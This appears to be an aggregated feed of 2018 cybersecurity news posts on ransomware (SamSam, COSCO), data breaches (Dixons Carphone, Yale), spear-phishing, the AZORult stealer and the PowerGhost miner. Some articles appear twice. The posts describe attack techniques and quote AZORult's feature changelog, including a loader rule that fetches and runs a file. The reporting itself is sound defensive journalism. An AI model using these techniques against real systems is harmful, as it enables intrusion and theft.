“However, by using the call optimization service’s tag in the URL the scammers can dynamically insert phone numbers into their scam pages,” continues Symantec. 

“This can be useful, for example, if victims are based in multiple countries, as the victim can be shown a phone number that calls someone that speaks their language.”

Crooks can abuse Call Optimization Services in their tech support scams also for other goals, for example, to provide analytics, to implement load balancing during busy times to avoid losing calls.

Pierluigi Paganini

(Security Affairs – Call Optimization Services, tech support scams)

The post Tech Support Scams improved with adoption of Call Optimization Service appeared first on Security Affairs.

A malware paralyzed TSMC plants where also Apple produces its devices

A virus has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the plants where Apple produces its devices

A malware has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the iPhone chipmaker plans.

TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.

According to Bloomberg that first reported the news, the infection caused one of the most severe disruptions suffered by the company as it ramps up chipmaking for Apple Inc.’s next iPhones.

The company contained the problem, but some of the affected plants will not able to restart before Sunday.

“The sole maker of the iPhone’s main processor said a number of its fabrication tools had been infected, and while it had contained the problem and resumed some production, several of its factories won’t restart till at least Sunday. The virus wasn’t introduced by a hacker, the company added in a statement.” states the Bloomberg.

“Certain factories returned to normal in a short period of time, and we expect the others will return to normal in one day,” the company said in its Saturday statement.

This is the first time that a malware cripples a TSMC facility paralyzing the production, according to the company “the degree of infection varied from factory to factory.”

“TSMC has been attacked by viruses before, but this is the first time a virus attack has affected our production lines,” Chief Financial Officer Lora Ho told Bloomberg News by phone.

TSMC Apple infection

The economic impact of this kind of incidents could be severe, at the time there is no info about losses caused by the attack on the Taiwanese firm.

At the time it is not possible to estimate the potential effects on the production of Apple devices, “the implications are also unclear for Apple.”

“The incident comes weeks after TSMC cheered investors with a rosy outlook for smartphone demand in the latter half of the year. That helped the market look past a reduced revenue outlook.” reported Bloomberg.

“A bellwether for the chip industry as well as an early indicator of iPhone demand, it heads into its busiest quarters grappling with waning enthusiasm for the high-powered chips used to mine digital currencies. Chief Executive Officer C. C. Wei had said TSMC’s sales will rise this year by a high single-digit percentage in U.S. dollar terms, down from an already reduced projection of about 10 percent”

Pierluigi Paganini

(Security Affairs – Taiwan Semiconductor Manufacturing Co, Apple)

The post A malware paralyzed TSMC plants where also Apple produces its devices appeared first on Security Affairs.

Hacking tools & ready-made phishing pages being sold on dark web for $2

By Waqas

Apple Hacking Tools Double the Cost of Other Brands on Dark Web. There was a time when hackers needed to be really smart to accomplish their malicious deeds; now they only need to spend a meager amount of money to get the necessary tools and carry out attacks. Or so it seems if we have […]

This is a post from HackRead.com Read the original post: Hacking tools & ready-made phishing pages being sold on dark web for $2

Do Businesses Know When They’re Using Unethical Data?

Data breaches are costly for businesses that expterience them, this data fuel the black markets and sometime are offered to complanies as legitimate data.

Data breaches are extraordinarily costly for businesses that experience them, both concerning reputational damage and money spent to repair the issues associated with those fiascos. And, on the consumer side of things, the scary thing is hackers don’t just steal data for notoriety. They do it to profit, typically by selling the snatched details online.

But, then, are other businesses aware of times when the data they just bought might have been stolen instead of legally obtained?

People Can Access Most of the Relevant Black Market Sites on Standard Browsers

There was a time when venturing into the world of the online black market typically meant downloading encryption software that hid the identity of users. However, most black market transactions happen on the “open” web so that it’s possible to access the respective sites via browsers like Firefox and Chrome without downloading special software first.

That means business representatives aren’t safe from coming across stolen data if they decide only to browse the internet normally. However, the kind of information advertised on the open web should be enough to raise eyebrows by itself. It often contains credit card information or sensitive medical details — not merely names, email addresses or phone numbers.

Companies can reduce the chances of unknowingly benefiting from stolen data by not proceeding with purchases if they contain private, not readily obtainable details.

Illegitimate Sellers Avoid Giving Payment Details

Even when people seek to profit by peddling stolen data, their desire to make money typically isn’t stronger than their need to remain anonymous. Most criminals who deal with data from illegal sources don’t reveal their names even when seeking payment. They’ll often request money through means that allow keeping their identities secret, such as Bitcoin.

Less Information, More Suspicion

If companies encounter data sellers that stay very secretive about how they get their data and whether it is in compliance with data protection and sharing standards, those are red flags.

However, even when data providers do list information about how they obtain data, it’s a good idea to validate the data on your own. For example, if you get calling data from a third-party provider, you should always check it against current Do Not Call lists.

Dark Web Monitoring Services Exist

As mentioned above, stolen data frequently works its way through the open web rather than the dark web. However, it’s still advisable for companies to utilize monitoring services that search the dark web for stolen data. The market for such information is lucrative, and some clients pay as much as $150,000 annually for such screening measures. If businesses provide data that comes up as originating from the dark web, that’s a strong indicator that it came from unethical sources.

data breaches

Do Legitimate Companies Create the Demand for Stolen Data?

It’s difficult to quantify how many reputable companies might be purchasing stolen data. If they do it knowingly, such a practice breaks the law. And, even if it happens without their knowledge, that’s still a poor reflection on those responsible. It means they didn’t carefully check data sources and sellers before going through with a purchase.

Unfortunately, analysts believe it happens frequently. After data breaches occur, some of the affected companies discover their data being sold online and buy it back. When hackers realize even those who initially had the data seized will pay for it, they realize there’s a demand for their criminal actions.

After suffering data breaches, some companies even ask their own employees to find stolen data and buy it back.

Most use intermediary parties, though representatives at major companies, including PayPal, acknowledge that this process of compensating hackers for the data they took occurs regularly. They say it’s part of the various actions that happen to protect customers — or to prevent them from knowing breaches happened at all.

If companies can find and recover their stolen data quickly enough, customers might never realize hackers had their details. That’s especially likely, since affected parties often don’t hear about breaches until months after companies do, giving those entities ample time to locate data and offer hackers a price for it.

Plus, it’s important to remember that companies pay tens of thousands of dollars to recover their data after ransomware attacks, too.

Should Businesses Bear the Blame?

When companies buy data that’s new to them, they should engage in the preventative measures above to verify its sources and check that it’s not stolen. Also, although businesses justify buying compromised data back from hackers, they have to remember that by doing so, they are stimulating demand — and that makes them partially to blame.

Instead of spending money to retrieve data that hackers take, those dollars would be better spent cracking down on the vulnerabilities that allow breaches to happen so frequently.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

 

 

Pierluigi Paganini

(Security Affairs – stolan data, data breach)

The post Do Businesses Know When They’re Using Unethical Data? appeared first on Security Affairs.

Massive ransomware attack forcing authorities to move to typewriters

By Waqas

The ransomware attack also forced employees to use hand receipts. Two municipalities in Alaska (one town and one borough to be precise) have become victims of sophisticated encryption-based malware (ransomware) attack. Reportedly, the Matanuska-Susitna (Mat Su) and the City of Valdez have both been targeted with ransomware. Moving to typewriters The attack has had a devastating impact as […]

This is a post from HackRead.com Read the original post: Massive ransomware attack forcing authorities to move to typewriters

Industrial Sector targeted in surgical spear-phishing attacks

Industrial sector hit by a surgical spear-phishing campaign aimed at installing legitimate remote administration software on victims’ machines.

Attackers carried out a spear-phishing campaign against entities in the industrial sector, the messages disguised as commercial offers where used by attackers to deliver a legitimate remote administration software on victims’ systems (TeamViewer or Remote Manipulator System/Remote Utilities (RMS)).

Attackers personalized the content of each phishing email reflecting the activity of the target organization and the type of work performed by the employee to whom the email is sent.

The campaign was discovered by experts from Kaspersky Lab who speculate the attackers are financially motivated.

“Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.” reads the blog post published by Kaspersky.

“According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts,”

Once the attackers have gained access to the victim’s system they will search for any purchase documents, as well as the financial and accounting software. Then the crooks look for various ways in which they can monetize their effort, for example, by spoofing the bank details used to make payments.

According to Kaspersky, there was a spike in the number of spear phishing messages in  November 2017 that targeted up to 400 industrial companies located in Russia.

industrial sector spear-phishing

The spear-phishing campaign is still ongoing, the messages purported to be invitations to tender from large industrial companies.

The quality of the phishing messages suggests the attackers have spent a significant effort in the reconnaissance phase.

“It is worth noting that the attackers addressed an employee of the company under attack by his or her full name,” state the researchers. “This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.”

The attackers used both malicious attachments and links to external resources that are used to download the malicious code.

“Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.” states the researchers.

“For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.”

The malicious library includes the system file winspool.drv that is located in the system folder and is used to send documents to the printer.

The winspool.drv decrypts the attackers’ configuration files, including software settings and the password for remotely controlling the target machine.

In the case of RMS, one of the configuration files includes the email address used by the attacker to receive the information (i.e. computer name, username and the RMS machine’s internet ID) about the infected system.

When the attackers use TeamViewer software to exfiltrate system information, a file in a malicious library contains various parameters, including the password used for remotely controlling the system and a URL of the attackers’ command-and-control server.

Unlike RMS, Team Viewer also uses a built-in VPN to remotely control a computer located behind NAT.

“After launching, the malicious library checks whether an internet connection is available by executing the command “ping 1.1.1.1” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.” continues the analysis.

“Unlike RMS, Team Viewer uses a built-in VPN to remotely control a computer located behind NAT.”

The use of legitimate Remote administration software allows crooks to gain full control of compromised systems avoiding detection.

“This choice on the part of the cybercriminals could be explained by the fact that the threat-awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies),” Kaspersky concludes.

Pierluigi Paganini

(Security Affairs – industrial sector, cybercrime)

The post Industrial Sector targeted in surgical spear-phishing attacks appeared first on Security Affairs.

Notorious hacking group Fin7’s 3 main hackers arrested by the FBI

By Waqas

Three members of a ‘prolific’ and ‘notorious’ hacking group, known for carrying out massive hacking sprees against high-profile organizations have been arrested by the Federal Bureau of Investigation (FBI). According to the US Department of Justice (DOJ), the arrested individuals were leading the global cybercrime syndicate known as Fin7. The group has stolen over 15m […]

This is a post from HackRead.com Read the original post: Notorious hacking group Fin7’s 3 main hackers arrested by the FBI

Dixons Carphone cyber breach could have affected millions more

The retailer has revealed that 10m customers have been affected by the breach. When Dixons Carphone first revealed that it had suffered a data breach last year, the retailer said that

The post Dixons Carphone cyber breach could have affected millions more appeared first on The Cyber Security Place.

3 Carbanak (FIN7) Hackers Charged With Stealing 15 Million Credit Cards

Three members of one of the world's largest cybercrime organizations that stole over a billion euros from banks across the world over the last five years have been indicted and charged with 26 felony counts, the Justice Department announced on Wednesday. The three suspects are believed to be members of the organized Russian cybercrime group known as FIN7, the hackers group behind Carbanak and

Ten years ago someone breached into a server of the Yale University

Ten years ago someone breached into a server of the Yale University, but because the intrusion happened nearly ten years ago there is much more information about how it occurred.

After ten years, Yale University revealed a security breach that exposed an archive containing personal information of 119,000 people.

Hackers breached into the database of the famous University between April 2008 and January 2009 and apparently accessed a server where it is hosted a single database.

“On July 26th and 27th, Yale mailed notices to members of the Yale community, including alumni/ae, faculty members, and staff members, who were affected by a data intrusion that occurred in 2008-2009.” reads the security alert published by the Yale University.

yale university

The database contained data of individuals affiliated with the university, the unauthorized access was discovered on June 16, 2018, during a security review.

The hackers accessed names, Social Security numbers, dates of birth, Yale email addresses, and in some cases the physical addresses of individuals associated with the university.

Unfortunately, there is no way to understand how attackers hacked the server either “it is not feasible to determine the identities of the perpetrators.”

The academic institution announced that no financial information was exposed, it sent a notice letter to 97% of affected people in the Yale community.

Unfortunately, there is another disconcerting news for the Yale community, a letter sent by the University to the State of New Hampshire Attorney General, revealed that the same server was hacked a second time between March 2016 and June 2018.

This second intrusion caused the exposure of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale is offering identity monitoring services to all affected U.S. residents through the Kroll security firm. At the time there is no indication that the exposed data has been misused.

Pierluigi Paganini

(Security Affairs – Yale University, hacking)

The post Ten years ago someone breached into a server of the Yale University appeared first on Security Affairs.

How a man hacked his victims’ SIM cards to steal millions of dollars

By Waqas

Californian Authorities have arrested and charged a 20-year old college student Joel Ortiz for being part of a mobile phone hijacking group who hacked SIM cards. According to reports the detainee managed to hijack over 40 phone numbers and stole $5 million as well from high-profile targets including cryptocurrency investors. The Boston resident Ortiz was […]

This is a post from HackRead.com Read the original post: How a man hacked his victims’ SIM cards to steal millions of dollars

Spam still the most common cyber crime technique, according to recent research

According to a recent study by cyber security firms F-Secure and MWR InfoSecurity, spam remains the first choice for malware implementation. Spam remains popular among cyber criminals 40 years after

The post Spam still the most common cyber crime technique, according to recent research appeared first on The Cyber Security Place.

Security Affairs: SamSam Ransomware operators earned more than US$5.9 Million since late 2015

The security experts from Sophos have published a report on the multimillion-dollar black market business for crooks, they analyzed the SamSam ransomware case as a case study.

The researchers that have tracked Bitcoin addresses managed by the crime gang discovered that crooks behind the SamSam ransomware had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

“In total, we have now identified 157 unique addresses which have received ransom payments as well as 89 addresses which have been used on ransom notes and sample files but, to date, have not received payments,” continues the report published by Sophos.

“By analyzing the payments, and comparing this with ransom notes at the time, we can estimate the number of individual victims who have chosen to pay at least some of the ransom amount stands at 233 as of July 19th 2018. With an estimated 1 new victim being attacked each day, we believe that roughly 1 in 4 victims pay at least some of the ransom. “

SamSam report 1

SamSam ransomware payments

The attackers deploy the SamSam ransomware manually by compromising RDP on the target machine, this aspect makes SamSam infections different from the ones associated with other ransomware that leverages spam campaigns or malvertising.

The attackers carry on brute-force attacks on RDP of the target system, some time they leverage credentials obtained from other data breaches typically offered for sale on the dark web.

Once compromised a system inside the targeted organization, the SamSam search for other machines to infect while stealing credentials.

When operators discover a potential target they manually deploy SamSam using tools like PSEXEC and batch scripts.

The following diagram shows the different steps of the latest SamSam variant for which the initial infection vector is still unclear.

SamSam new variant

Once infected the largest number of systems in the targeted organization, operators attempt to offer a complete clean up of the infected systems for a special price.

The highest estimate has been US$850,000 worth of bitcoin for the decryption keys.

The encryption process first involves most valuable data thanks to a multi-tiered priority system, SamSam ransomware doesn’t encrypt Windows system-related files.

Since its discovery, the SamSam ransomware targeted large organizations, including hospitals and educational institutions.

Sophos provides the following recommendations to secure the network of organizations against the SamSam ransomware:

  • regularly patch against known vulnerabilities for the applications and operating systems;
  • keep regular backups;
  • use multi-factor authentication;
  • restrict access to RDP(on port 3389);

Pierluigi Paganini

(Security Affairs – ransomware, malware)

The post SamSam Ransomware operators earned more than US$5.9 Million since late 2015 appeared first on Security Affairs.



Security Affairs

SamSam Ransomware operators earned more than US$5.9 Million since late 2015

The security experts from Sophos have published a report on the multimillion-dollar black market business for crooks, they analyzed the SamSam ransomware case as a case study.

The researchers that have tracked Bitcoin addresses managed by the crime gang discovered that crooks behind the SamSam ransomware had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

“In total, we have now identified 157 unique addresses which have received ransom payments as well as 89 addresses which have been used on ransom notes and sample files but, to date, have not received payments,” continues the report published by Sophos.

“By analyzing the payments, and comparing this with ransom notes at the time, we can estimate the number of individual victims who have chosen to pay at least some of the ransom amount stands at 233 as of July 19th 2018. With an estimated 1 new victim being attacked each day, we believe that roughly 1 in 4 victims pay at least some of the ransom. “

SamSam report 1

SamSam ransomware payments

The attackers deploy the SamSam ransomware manually by compromising RDP on the target machine, this aspect makes SamSam infections different from the ones associated with other ransomware that leverages spam campaigns or malvertising.

The attackers carry on brute-force attacks on RDP of the target system, some time they leverage credentials obtained from other data breaches typically offered for sale on the dark web.

Once compromised a system inside the targeted organization, the SamSam search for other machines to infect while stealing credentials.

When operators discover a potential target they manually deploy SamSam using tools like PSEXEC and batch scripts.

The following diagram shows the different steps of the latest SamSam variant for which the initial infection vector is still unclear.

SamSam new variant

Once infected the largest number of systems in the targeted organization, operators attempt to offer a complete clean up of the infected systems for a special price.

The highest estimate has been US$850,000 worth of bitcoin for the decryption keys.

The encryption process first involves most valuable data thanks to a multi-tiered priority system, SamSam ransomware doesn’t encrypt Windows system-related files.

Since its discovery, the SamSam ransomware targeted large organizations, including hospitals and educational institutions.

Sophos provides the following recommendations to secure the network of organizations against the SamSam ransomware:

  • regularly patch against known vulnerabilities for the applications and operating systems;
  • keep regular backups;
  • use multi-factor authentication;
  • restrict access to RDP(on port 3389);

Pierluigi Paganini

(Security Affairs – ransomware, malware)

The post SamSam Ransomware operators earned more than US$5.9 Million since late 2015 appeared first on Security Affairs.

Security Affairs: Ransomware attack against COSCO spread beyond its US network to Americas

New revelations on the attack against COSCO confirm it was worse than initially thought, the ransomware spread beyond the US network.

Chinese shipping giant COSCO recently suffered a ransomware attack that disrupted some systems of the company in the United States.

The shipping company quickly isolates the systems to avoid propagation to other regions and started an internal investigation, the firm confirmed that the incident did not affect operations of the fleet.

“After the network security problem in the Americas has been detected, to protect the interests of our customers, we have taken proactive measures to isolate internal networks to carry out technical inspections on global scale.” COSCO said in an official statement. “With the reliable confirmation from the technical experts that the networks in all other regions are secure, the network applications were recovered at 16:00 (Beijing Time) on 25th July in all the regions except the Americas. As of now, all the business operations have been back to normal in the regions with network recovered.”

New revelations on the attack confirm it was worse than initially thought, the malicious code spread beyond the US network of the company and infected systems in other countries, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.

“Chinese shipping giant COSCO said a ransomware attack has spread beyond its US network to the broader Americas, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.” reported the CBR website.

“That’s according to maritime intelligence house Lloyds List, which has reported that customers were also said to be facing issues in the UK and Turkey.” 

Due to local network breakdown within the America regions, local email and network telephone were not able to work properly at the moment of the attack.

The attack on the world’s largest shipping company by dry weight tonnage has taken out emails and phones.

The company published a list of alternative Yahoo! email addresses to its customers for ordinary communications.

Security experts warned that COSCO fleet could still be at risk following the attack.

“Although COSCO has been quick to respond to this hack, the virus may have been dormant for some time, so I would not be surprised if other systems – shore- and ship-based systems – have been breached. We strongly recommend to whoever discovered the attack to thoroughly verify the breach has been contained and has not infected any ships in the COSCO fleet.” Maritime cybersecurity specialists Naval Dome told IHS Fairplay:

The ransomware attack against COSCO doesn’t appear severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

Pierluigi Paganini

(Security Affairs – COSCO, ransomware attack)

The post Ransomware attack against COSCO spread beyond its US network to Americas appeared first on Security Affairs.



Security Affairs

Ransomware attack against COSCO spread beyond its US network to Americas

New revelations on the attack against COSCO confirm it was worse than initially thought, the ransomware spread beyond the US network.

Chinese shipping giant COSCO recently suffered a ransomware attack that disrupted some systems of the company in the United States.

The shipping company quickly isolates the systems to avoid propagation to other regions and started an internal investigation, the firm confirmed that the incident did not affect operations of the fleet.

“After the network security problem in the Americas has been detected, to protect the interests of our customers, we have taken proactive measures to isolate internal networks to carry out technical inspections on global scale.” COSCO said in an official statement. “With the reliable confirmation from the technical experts that the networks in all other regions are secure, the network applications were recovered at 16:00 (Beijing Time) on 25th July in all the regions except the Americas. As of now, all the business operations have been back to normal in the regions with network recovered.”

New revelations on the attack confirm it was worse than initially thought, the malicious code spread beyond the US network of the company and infected systems in other countries, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.

“Chinese shipping giant COSCO said a ransomware attack has spread beyond its US network to the broader Americas, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.” reported the CBR website.

“That’s according to maritime intelligence house Lloyds List, which has reported that customers were also said to be facing issues in the UK and Turkey.” 

Due to local network breakdown within the America regions, local email and network telephone were not able to work properly at the moment of the attack.

The attack on the world’s largest shipping company by dry weight tonnage has taken out emails and phones.

The company published a list of alternative Yahoo! email addresses to its customers for ordinary communications.

Security experts warned that COSCO fleet could still be at risk following the attack.

“Although COSCO has been quick to respond to this hack, the virus may have been dormant for some time, so I would not be surprised if other systems – shore- and ship-based systems – have been breached. We strongly recommend to whoever discovered the attack to thoroughly verify the breach has been contained and has not infected any ships in the COSCO fleet.” Maritime cybersecurity specialists Naval Dome told IHS Fairplay:

The ransomware attack against COSCO doesn’t appear severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

Pierluigi Paganini

(Security Affairs – COSCO, ransomware attack)

The post Ransomware attack against COSCO spread beyond its US network to Americas appeared first on Security Affairs.

Dixons Carphone Data Breach discovered in June affected 10 Million customers

Dixons Carphone announced on Monday that the security breach discovered in June affected around 10 million customers, much more than the initial estimate.

Dixons Carphone, one of the largest European consumer electronics and telecommunication retailers, suffered a major data breach in 2017, but new data related to the incident have been shared.

The situation was worse than initially thought, the company announced on Monday that the security breach affected around 10 million customers, much more than the initial estimate.

“Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017.” reads a statement published by the company.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated.”

Dixons Carphone discovered in June 2017 an “unauthorised access” to certain data held by the company, it promptly launched an investigation and hired an external firm to shed the light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

Hackers may have accessed personal information of the affected customers including their names, addresses and email addresses last year.

In June it was estimated that hackers accessed data of 1.2 million people and 5.9 million payments cards used at Currys PC World and Dixons Travel were exposed.

Dixons Carphone assured its customers that no financial data was exposed (pin codes, card verification values and authentication data).

“As a precaution, we are choosing to communicate to all of our customers to apologize and advise them of protective steps to minimize the risk of fraud,” continues the statement. “We are continuing to keep the relevant authorities updated.”

Dixons Carphone hack

The company announced further security measure to protect its system and confirmed that all necessary action to lock put the attackers have been taken.

“We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring, and testing,” Dixons said.

This isn’t the first time that the company suffers a security breach, in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are anyway potentially exposed to phishing attacks and have to be vigilant.

Pierluigi Paganini

(Security Affairs –Carphone Warehouse, data breach)

The post Dixons Carphone Data Breach discovered in June affected 10 Million customers appeared first on Security Affairs.

Why trust is the biggest selling point for cybersecurity companies

Companies that lose the trust of their customers will have a hard time finding new clients.The European Union’s recent resolution to help strengthen member states’ cybersecurity measures was a clear

The post Why trust is the biggest selling point for cybersecurity companies appeared first on The Cyber Security Place.

A new sophisticated version of the AZORult Spyware appeared in the wild

A new sophisticated version of the AZORult Spyware was spotted in the wild, it was involved in a large email campaign on July 18

Malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild, it was involved in a large email campaign on July 18, just 24 hours it appeared in cybercrime forums on the Dark Web.

Attackers sent out thousands of messages targeting North America. The messages used employment-related subjects such as “About a role” and “Job Application,” while the malicious attached documents used file names in the format of “firstname.surname_resume.doc”.

“AZORult is a robust information stealer & downloader that Proofpoint researchers originally identified in 2016 as part of a secondary infection via the Chthonic banking Trojan. We have since observed many instances of AZORult dropped via exploit kits and in fairly regular email campaigns as both a primary and secondary payload.” reads the analysis published by ProofPoint.

“Recently, AZORult authors released a substantially updated version, improving both on its stealer and downloader functionality.”

AZORult spyware

AZORult is a data stealer that was first spotted in 2016 by Proofpoint that discovered it was it was part of a secondary infection via the Chthonic banking trojan. Later it was involved in many malspam attacks, but only now the authors released a substantially updated variant.

The latest version appears more sophisticated than previous ones, it implements the ability to steal histories from browsers (except IE and Edge), it includes a conditional loader that checks certain parameters before running the malicious code, and includes the support for Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC cryptocurrency wallets.

Below the full change log:

  • UPD v3.2
  • [+] Added stealing of history from browsers (except IE and Edge)
  • [+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
  • [+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from mysite.com, then download and run the file link[.]com/soft.exe. Also there is a rule “If there is data from cryptocurrency wallets” or “for all”
  • [+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
  • [+] Reduced the load in the admin panel.
  • [+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
  • [+] Added to the admin panel guest statistics
  • [+] Added to the admin panel a geobase

The conditional loader allows the attackers to infect only systems with specific characteristics, for example, it can check if certain desired cookies or saved passwords from specific sites are present on the victim’s machine,

After the malware has successfully connected the C&C server, it will send back to it the following files:

Next, after the initial exchange between the infected machine and the C&C server, the infected machine sends a report containing the stolen information. Again the report is XOR-encoded with the same 3-byte key; a portion of  the decoded version is shown in Figure 5. The stolen information is organized into sections:

  • info: basic computer information such as Windows version and computer name
  • pwds: this section contains stolen passwords (not confirmed)
  • cooks: cookies or visited sites
  • file: contents of the cookies files and a file containing more system profiling information including machine ID, Windows version, computer name, screen resolution, local time, time zone, CPU model,  CPU count,  RAM, video card information, process listing of the infected machine, and software installed on the infected machine.

Once completed this phase, AZORult may download the next-stage payload.

The experts attributed the campaign to the TA516 threat actor that was focused on cryptocurrencies.

“As in legitimate software development, malware authors regularly update their software to introduce competitive new features, improve usability, and otherwise differentiate their products.” said ProofPoint.

“The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes. It is noteworthy that within a day of the new update appearing on underground forums, a prolific actor used the new version in a large email campaign, leveraging its new capabilities to distribute Hermes ransomware.”

Experts noticed that the infection process requests a significant users’ interaction to avoid antivirus. The victims would have to download the document that is password-protected, only after providing the password in a pop-up box included in the body of the email, the attack starts by requesting users to enable macros.

The macros download AZORult, which in turn downloads the Hermes 2.1 ransomware.

“AZORult malware, with its capabilities for credential and cryptocurrency theft, brings potential direct financial losses for individuals as well as the opportunity for actors to establish a beachhead in affected organizations,” concluded the experts.

Pierluigi Paganini

(Security Affairs – AZORult,  hacking)

The post A new sophisticated version of the AZORult Spyware appeared in the wild appeared first on Security Affairs.

Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread

Security experts from Kaspersky Lab have spotted a new cryptocurrency miner dubbed PowerGhost that can spread leveraging a fileless infection technique.

The PowerGhost miner targets large corporate networks, infecting both workstations and servers, it employing multiple fileless techniques to evade detection.

“The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” reads the analysis published by Kaspersky.

“This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation.”

The PowerGhost leverages the NSA-linked EternalBlue exploit to spread, it is obfuscated PowerShell script containing malware’s core code, along with many other add-on modules such as the miner, miner libraries, the Mimikatz post-exploitation too, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.

The victim system is infected remotely using exploits or remote administration tools (Windows Management Instrumentation), experts discovered that during the infection phase a one-line PowerShell script is executed to drop the core of the miner component and execute it, the entire process in the memory of the system.

The first thing that the malware does it to check the command and control (C&C) server and, if a new version is available, it downloads and executes it.

Then the malware uses the Mimikatz tool to get the user account credentials from the machine and use it to attempt lateral movements inside the target network.

Propagation.With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.” continues the analysis. 

PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (CVE-2017-0144).”

Once infected a machine, the PowerGhost attempts to escalate privileges by using various exploits such as the one for CVE-2018-8120.

In order to establish a foothold in the infected system, the PowerGhost saves all the modules as properties of a WMI class, while miner main body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

The script executes the miner by loading a PE file via reflective PE injection.

Most of the PowerGhost infections were observed in India, Brazil, Columbia, and Turkey.

PowerGhost

Experts discovered also a PowerGhost version that implements DDoS capability, a circumstance that leads Kaspersky into believing that authors attempted to create a DDoS-for-hire service.

Further details, including Indicators of Compromise (IoCs) are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(Security Affairs – PowerGhost, cryptocurrency miner)

The post Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread appeared first on Security Affairs.

KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens

ICO platforms are becoming a privileged target for hackers, the last victim in order of time is KickICO, a Blockchain crowdfunding website for ICO.

On Friday, KickICO disclosed a security breach, according to the platform attackers accessed to its wallets and stole over 70 million KICK tokens (roughly $7.7 million at the time).

The incident occurred on July 26, at 09:04 UTC, KickICO CEO Anti Danilevski explained that its staff learned of the security breach from victims who complained to it.

KICKICO hack

“On July 26 at 9:04 (UTC) KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets.” reads the data breach notification published by the company.

